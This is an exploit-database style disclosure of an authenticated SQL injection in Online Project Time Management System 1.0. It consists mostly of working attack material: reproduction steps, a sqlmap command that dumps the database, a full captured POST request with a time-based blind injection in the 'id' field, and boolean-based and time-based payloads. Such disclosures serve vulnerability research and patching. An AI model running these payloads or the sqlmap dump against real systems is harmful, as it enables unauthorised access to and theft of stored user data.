# Exploit Title: Online Project Time Management System 1.0 - SQLi (Authenticated) # Date: 19/01/2022 # Exploit Author: Felipe Alcantara (Filiplain) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: Kali Linux # Steps to reproduce # Log in as an employee # Go to : http://localhost/ptms/?page=user # Click Update # Save request in BurpSuite # Run saved request with sqlmap: sqlmap -r request.txt --batch --risk 3 --level 3 --dump ========================== POST /ptms/classes/Users.php?f=save_employee HTTP/1.1 Host: localhost Content-Length: 1362 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Content-Type: multipart/form-data; boundary=----WebKitFormBoundary39q8yel1pdwYRLNz Origin: http://localhost Referer: http://localhost/ptms/?page=user Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm Connection: close ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="id" 4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="code" 2022-0003 ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="generated_password" ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="firstname" Mark 2223 ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="middlename" Z ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="lastname" Cooper ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="gender" Male ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="department" IT Department ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="position" Department Manager ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="email" mcooper@sample.com ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="password" ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary39q8yel1pdwYRLNz-- ========================== #Payloads #++++++++++++ #Payload: (Boolean-Based Blind) #------WebKitFormBoundary39q8yel1pdwYRLNz #Content-Disposition: form-data; name="id" #4' or 1=1 -- #-------- #Payload: (time-based blind) #------WebKitFormBoundary39q8yel1pdwYRLNz #Content-Disposition: form-data; name="id" #4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test #-------